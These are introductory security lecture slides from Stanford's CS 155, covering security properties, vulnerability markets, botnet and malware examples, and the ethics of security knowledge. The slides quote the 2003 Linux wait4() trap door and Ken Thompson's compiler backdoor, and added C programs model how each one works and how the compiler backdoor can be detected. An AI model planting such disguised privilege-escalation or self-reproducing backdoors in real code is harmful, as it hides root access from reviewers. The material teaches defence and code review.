
CS 155

Spring 2013

Computer and Network Security

Dan Boneh and John Mitchell
https://courseware.stanford.edu/pg/courses/CS155

What's this course about?

Intro to computer and network security
Some challenging, fun projects
Learn about attacks
Learn about preventing attacks
Lectures on related topics
  Application and operating system security
  Web security
  Network security, mobile app security
Not a course on cryptography (take CS255!)

Organization (subject to change)

General course info (see web)
Introduction to project assignments
Prerequisite: Operating systems (CS140)
Textbook: none, reading online
Coursework: 3 projects, 2 homeworks, final exam
  Grade: 0.25 H + 0.5 P + 0.25 F
Teaching assistants
  Occasional optional section

Application and OS security (5 lectures)
  Buffer overflow project
  Vulnerabilities: control hijacking attacks, fuzzing
  Prevention: system design, robust coding, isolation

Web security (4 lectures)
  Web site attack and defenses project
  Browser policies, session mgmt, user authentication
  HTTPS and web application security

Network security (6 lectures)
  Network traceroute and packet filtering project
  Protocol designs, vulnerabilities, prevention
  Malware, botnets, DDoS, network security testing

A few other topics
  Cryptography (user perspective), digital rights management, final guest lecture

SECURITY CONCEPTS

What is security?

System correctness
  If user supplies expected input, system generates desired output
  Good input -> Good output
  More features: better

Security
  If attacker supplies unexpected input, system does not fail in certain ways
  Bad input -> Bad output (the failure to prevent)
  More features: can be worse

Security properties

Confidentiality
  Information about system or its users cannot be learned by an attacker

Integrity
  The system continues to operate properly, only reaching states that would occur if there were no attacker

Availability
  Actions by an attacker do not prevent users from having access to use of the system

General picture

Security is about
  Honest users (e.g., Alice, Bob, ...)
  Dishonest attacker
  How the attacker
    disrupts honest users' use of the system (Integrity, Availability)
    learns information intended for Alice only (Confidentiality)

Network security
  Alice <-> Network <-> System
  Network attacker: intercepts and controls network communication

Web security
  Web attacker: sets up malicious site visited by victim; no control of network

Operating system security
  OS attacker: controls malicious files and applications

Confidentiality: Attacker does not learn Alice's secrets
Integrity: Attacker does not undetectably corrupt system's function for Alice
Availability: Attacker does not keep system from being useful to Alice

TRENDS AND STATISTICS

The computer security problem
  Lots of buggy software (and gullible users)
  Money can be made from finding and exploiting vulnerabilities.
    Marketplace for vulnerabilities
    Marketplace for owned machines (PPI)
    Many methods to profit from owned client machines

MITRE tracks vulnerability disclosures
  (chart: cumulative disclosures by year through 2010, and percentage from web applications)
  Source: IBM X-Force, Mar 2011. Data: http://cve.mitre.org/

Reported Web Vulnerabilities "In the Wild"
  Data from aggregator and validator of NVD-reported vulnerabilities
  (chart: web vs system vulnerabilities; XSS peak; decline in % web vulns since 2009)
  49% in 2010 -> 37% in 2011. Big decline in SQL injection vulnerabilities

Mobile Operating Systems
  (chart: mobile OS vulnerabilities and mobile OS exploits)
  Source: IBM X-Force, Mar 2011

Phishing?

Bot networks
  Continue to be a major problem (e.g., spam)

THE MARKETPLACE FOR VULNERABILITIES

Marketplace for Vulnerabilities
  Option 1: bug bounty programs
    Google Vulnerability Reward Program: 3K $
    Mozilla Bug Bounty program: 500$
    Pwn2Own competition: 15K $
  Option 2: ZDI, iDefense: 2K - 25K $
  Option 3: black market
  Source: Charlie Miller (securityevaluators.com/files/papers/0daymarket.pdf)

Marketplace for owned machines
  (diagram: clients (spam, bot, keylogger) -> PPI service -> victims)
  Pay-per-install (PPI) services
    Own victim's machine
    Download and install client's code
    Charge client
  Cost: US 100-180$ / 1000 machines; Asia 7-8$ / 1000 machines
  Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

ATTACKER GOALS, EXAMPLES

Why own machines: IP address and bandwidth stealing
  Attacker's goal: look like a random Internet user
  Use the infected machine's IP address for:
    Spam (e.g. the Storm botnet)
      Spamalytics: 1:12M pharma spams leads to purchase
      1:260K greeting card spams leads to infection
    Denial of Service: services: 1 hour (20$), 24 hours (100$)
    Click fraud (e.g. Clickbot.a)

Why own machines: Steal user credentials
  Keylog for banking passwords, web passwords, gaming passwords
  Example: SilentBanker (2007)
    User requests login page
    Bank sends login page needed to log in
    Malware injects JavaScript
    When user submits information, it is also sent to attacker
  Similar mechanism used by Zeus botnet

Why own machines: Spread to isolated systems
  Example: Stuxnet
    Windows infection
    Siemens PCS 7 SCADA control software on Windows
    Siemens device controller on isolated network
  More on this later in course

Drive-by Downloads

Web attack toolkit: MPack
  Basic setup
    Toolkit hosted on web server
    Infects pages on that server
    Page visitors get infected
  Features
    Customized: determines exploit on the fly, based on user's OS, browser, etc.
    Easy to use: management console provides stats on infection rates
    Customer care: toolkit can be purchased with one-year support contract!

Insider attacks: example

Hidden trap door in Linux (Nov 2003)
  Allows attacker to take over a computer
  Practically undetectable change (uncovered via CVS logs)

Inserted line in wait4():

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;
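
The following is an added example, not part of the lecture slides or of the kernel: a small C model of why the inserted line is not the error check it resembles. The `struct task`, the `current` pointer and the uid values are stand-ins constructed for the demo; the flag values match the Linux wait flags of the same names.

```c
/* Added example (not from the lecture): the 2003 wait4() trap door modelled
 * on a stand-in task structure. `struct task` and `current` are constructed
 * for this demo and only imitate the kernel's task_struct->uid. */
#include <errno.h>
#include <stdio.h>

#ifndef __WCLONE
#define __WCLONE 0x80000000u   /* same values as the Linux/glibc wait flags */
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif

struct task { unsigned int uid; };

struct outcome { int retval; unsigned int uid_after; };

/* The committed line. `current->uid = 0` is an assignment, not a comparison:
 * its value is 0, so the && is always false and retval is never set. The
 * only effect is that the caller's uid has been overwritten with root's uid,
 * and only when the caller passes the unusual flag pair that triggers it.
 * The parentheses around the assignment are also what keep gcc's
 * -Wparentheses from warning about an assignment used as a truth value. */
static struct outcome trapdoor_check(unsigned int uid, unsigned int options)
{
    struct task task = { uid };
    struct task *current = &task;
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return (struct outcome){ retval, current->uid };
}

/* What an error check of that shape would actually look like: compare
 * instead of assign, so the caller's uid is never touched and the
 * flag combination is rejected for root. */
static struct outcome intended_check(unsigned int uid, unsigned int options)
{
    struct task task = { uid };
    const struct task *current = &task;
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return (struct outcome){ retval, current->uid };
}

int main(void)
{
    struct outcome a = trapdoor_check(1000, __WCLONE|__WALL);
    struct outcome b = intended_check(1000, __WCLONE|__WALL);
    printf("trap door: retval=%d uid=%u (unprivileged caller became root)\n",
           a.retval, a.uid_after);
    printf("intended:  retval=%d uid=%u\n", b.retval, b.uid_after);
    return 0;
}
```

The lesson for review is that a single `=` where `==` was expected produces code that compiles cleanly and never returns an error, which is why the change survived until someone compared the CVS history with the tree.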

Looks like a standard error check, but ...
See: http://lwn.net/Articles/57135/

WHAT CAN YOU TRUST?

Ken Thompson: What code can we trust?

Consider "login" or "su" in Unix
  Is RedHat binary reliable?
  Does it send your passwd to someone?
Can't trust binary, so check source, recompile
  Read source code or write your own
  Does this solve the problem?
Reflections on Trusting Trust, http://www.acm.org/classics/sep95/

Compiler backdoor
This is the basis of Thompson's attack
  Compiler looks for source code that looks like the login program
  If found, insert login backdoor (allow special user to log in)
How do we solve this?
  Inspect the compiler source

C compiler is written in C
Change compiler source S

    compiler(S) {
        if (match(S, "login-pattern")) {
            compile(login-backdoor)
            return
        }
        if (match(S, "compiler-pattern")) {
            compile(compiler-backdoor)
            return
        }
        ....  /* compile as usual */
    }

Clever trick to avoid detection
  Compile this compiler and delete backdoor tests from source
  Someone can compile standard compiler source to get new compiler, then compile login, and get login with backdoor
  Simplest approach will only work once
    Compiling the compiler twice might lose the backdoor
    But can make the code for the compiler backdoor output itself
    (Can you write a program that prints itself? Recursion theorem)

Read Thompson's article
  Short, but requires thought
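
The following is an added example, not from the slides or from Thompson's paper: a toy C model of the self-reproducing compiler backdoor described above. "Source" is a short string, a "binary" is a struct carrying a hidden flag that no source text mentions, and the program names, the user "alice", the password strings and the "ken-magic" trap-door credential are all constructed for the demo. The last function shows the defender's answer to "how do we solve this?", the comparison against an independently built compiler that Wheeler's diverse double-compiling is based on.

```c
/* Added example (not from the lecture or Thompson's paper): toy model of a
 * compiler whose binary carries a backdoor that re-inserts itself whenever
 * it compiles the (clean) compiler source. Everything here is constructed. */
#include <stdio.h>
#include <string.h>

enum kind { KIND_OTHER, KIND_LOGIN, KIND_COMPILER };

/* A "binary": what the compiler produced. The backdoored flag exists only
 * in binaries; it never appears in any source string below. */
struct binary {
    enum kind kind;
    int backdoored;
};

/* Clean sources. Neither mentions a backdoor, which is the point. */
static const char LOGIN_SRC[]    = "program login: check user against passwd file";
static const char COMPILER_SRC[] = "program cc: translate source to binary";

/* Two compiler binaries with identical source and different hidden state. */
static const struct binary HONEST_CC  = { KIND_COMPILER, 0 };
static const struct binary TAINTED_CC = { KIND_COMPILER, 1 };

static int match(const char *src, const char *pattern)
{
    return strstr(src, pattern) != NULL;
}

/* Compile `src` with compiler binary `cc`. An honest compiler just
 * classifies the program. A backdoored compiler recognises the slides'
 * "login-pattern" and "compiler-pattern" and emits a backdoored binary
 * for both, so the trap door propagates through clean source. */
static struct binary compile(const struct binary *cc, const char *src)
{
    struct binary out = { KIND_OTHER, 0 };
    if (cc->kind != KIND_COMPILER)
        return out;                      /* not a compiler at all */
    if (match(src, "program login"))
        out.kind = KIND_LOGIN;
    else if (match(src, "program cc"))
        out.kind = KIND_COMPILER;
    if (cc->backdoored && out.kind != KIND_OTHER)
        out.backdoored = 1;              /* Thompson's second pattern */
    return out;
}

/* Run a login binary: 1 = access granted. Only backdoored builds accept
 * the hard-coded credential; the source-level check is the same for both. */
static int run_login(const struct binary *login, const char *user, const char *pw)
{
    if (login->kind != KIND_LOGIN)
        return 0;
    int genuine = strcmp(user, "alice") == 0 && strcmp(pw, "correct horse") == 0;
    if (login->backdoored && strcmp(pw, "ken-magic") == 0)
        return 1;
    return genuine;
}

/* Rebuild the compiler from clean source `generations` times, then build
 * login from clean source, and report whether the trap door still works. */
static int trapdoor_survives(const struct binary *stage0, int generations)
{
    struct binary cc = *stage0;
    for (int i = 0; i < generations; i++)
        cc = compile(&cc, COMPILER_SRC);
    struct binary login = compile(&cc, LOGIN_SRC);
    return run_login(&login, "mallory", "ken-magic");
}

/* Defender's check: build the same compiler source with an independent,
 * trusted compiler and compare the outputs. Reading the source cannot
 * reveal the backdoor; comparing builds can. */
static int matches_independent_build(const struct binary *suspect_cc,
                                     const struct binary *trusted_cc)
{
    struct binary a = compile(suspect_cc, COMPILER_SRC);
    struct binary b = compile(trusted_cc, COMPILER_SRC);
    return a.kind == b.kind && a.backdoored == b.backdoored;
}

int main(void)
{
    printf("honest cc, 3 rebuilds: trap door works? %d\n",
           trapdoor_survives(&HONEST_CC, 3));
    printf("tainted cc, 3 rebuilds from clean source: trap door works? %d\n",
           trapdoor_survives(&TAINTED_CC, 3));
    printf("tainted cc matches independent build? %d\n",
           matches_independent_build(&TAINTED_CC, &HONEST_CC));
    return 0;
}
```

Recompiling the clean compiler source any number of times with the tainted binary keeps the trap door, which is the "output itself" step from the slide; the honest compiler never acquires it. The check at the end only helps if the second compiler really is independent of the first.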

Ethical use of security information

We discuss vulnerabilities and attacks
  Most vulnerabilities have been fixed
  Some attacks may still cause harm
  Do not try these at home or anyplace else
Purpose of this class
  Learn to prevent malicious attacks
  Use knowledge for good purposes

CONCLUDING

If you remember only one thing from this course:
  A vulnerability that is too complicated for anyone to ever find will be found and exploited!

We hope you remember more than one thing
